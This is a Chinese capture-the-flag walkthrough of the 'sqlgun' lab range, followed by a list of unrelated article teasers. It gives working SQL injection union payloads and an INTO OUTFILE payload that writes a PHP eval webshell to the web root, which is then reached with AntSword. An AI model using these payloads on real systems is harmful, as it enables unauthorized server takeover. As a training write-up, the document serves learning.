sqlgun靶场通关攻略

server/2024/9/22 16:53:44/

尝试在URL中测试一下sql注入,但是禁止注入

那么在输入框中测试一下xss,存在xss,那么极有可能如果存在sql注入在这里

在测试时,出现了这个搜索框的源代码,可以看出是单引号包含,所以可以测试闭合方式为单引号的sql注入

经测试,确实训在sql注入,闭合方式就是单引号

那么接下来测试回显点,得到2,3两个回显点

-1' union select 1,2,3#

数据库名,得到数据库sqlgunnews

-1' union select 1,database(),3#

既然存在sql注入,那么我们可以尝试一下写入一句话木马进行测试

但是缺少绝对路径

我们对IP进行目录扫描一下看一下有什么可以用的

发现有一个phpinfo.php文件,访问一下

得到网站根目录/var/www/html

那接下来构造payload,将一句话木马写入根目录

-1' union select 1,'<?php @eval($_POST[cmd]);?>',3 into outfile '/var/www/html/zxin.php' #

访问zxin.php文件,我们的一句话木马就在进去了

 使用蚁剑谅连接一下,成功连接

 在根目录中可以找得到falg文件


http://www.ppmy.cn/server/120363.html

相关文章

笔记:DrawingContext和GDI+对比简介

一、目的&#xff1a;分享一个wpf中级控件&#xff0c;鼠标放上展开其他控件的效果 DrawingContext 和 GDI 的 Graphics 类都是用于绘图的技术&#xff0c;但它们属于不同的图形库和框架&#xff0c;适用于不同的场景。让我们详细比较一下这两者。 二、对比 DrawingContext Dra…

专题·大模型安全 | 生成式人工智能的内容安全风险与应对策略

正如一枚硬币的两面&#xff0c;生成式人工智能大模型&#xff08;以下简称“生成式大模型”&#xff09;在助力内容生成的同时也潜藏风险&#xff0c;成为虚假信息传播、数据隐私泄露等问题的温床&#xff0c;加剧了认知域风险。与传统人工智能&#xff08;AI&#xff09;相比…

【算法题】63. 不同路径 II-力扣(LeetCode)-”如果起点有障碍物,那么便到不了终点“

【算法题】63. 不同路径 II-力扣(LeetCode)-”如果起点有障碍物&#xff0c;那么便到不了终点“ 1.题目 下方是力扣官方题目的地址 63. 不同路径 II 一个机器人位于一个 m x n 网格的左上角 &#xff08;起始点在下图中标记为 “Start” &#xff09;。 机器人每次只能向下…

Elasticsearch 检索优化:停用词的应用

Elasticsearch 检索优化&#xff1a;停用词的应用 场景描述 目前在 Elasticsearch 集群中存储约 1.5 亿篇文章数据&#xff0c;随着数据量的增加&#xff0c;检索性能问题逐渐显现。在列表检索和聚合操作中&#xff0c;CPU 消耗飙升至 100%&#xff0c;并且检索耗时较长&…

SSM+vue音乐播放器管理系统

音乐播放器管理系统 随着社会的发展&#xff0c;计算机的优势和普及使得音乐播放器管理系统的开发成为必需。音乐播放器管理系统主要是借助计算机&#xff0c;通过对首页、音乐推荐、付费音乐、论坛信息、个人中心、后台管理等信息进行管理。减少管理员的工作&#xff0c;同时…

LangChain教程 - 支持的向量数据库列举

系列文章索引 LangChain教程 - 系列文章 向量数据库是现代自然语言处理应用中不可或缺的组件&#xff0c;它们可以高效地存储、索引和检索嵌入向量&#xff0c;支持大规模的相似性搜索任务。LangChain 是一个强大的框架&#xff0c;允许开发者轻松将大型语言模型与向量数据库结…

【吊打面试官系列-MySQL面试题】MyISAM 表格将在哪里存储,并且还提供其存储格式?

大家好&#xff0c;我是锋哥。今天分享关于【MyISAM 表格将在哪里存储&#xff0c;并且还提供其存储格式&#xff1f;】面试题&#xff0c;希望对大家有帮助&#xff1b; MyISAM 表格将在哪里存储&#xff0c;并且还提供其存储格式&#xff1f; 每个 MyISAM 表格以三种格式存储…

Broadcast:Android中实现组件及进程间通信

目录 一&#xff0c;Broadcast和BroadcastReceiver 1&#xff0c;简介 2&#xff0c;广播使用 二&#xff0c;静态注册和动态注册 三&#xff0c;无序广播和有序广播 1&#xff0c;有序广播的使用 2&#xff0c;有序广播的截断 3&#xff0c;有序广播的信息传递 四&am…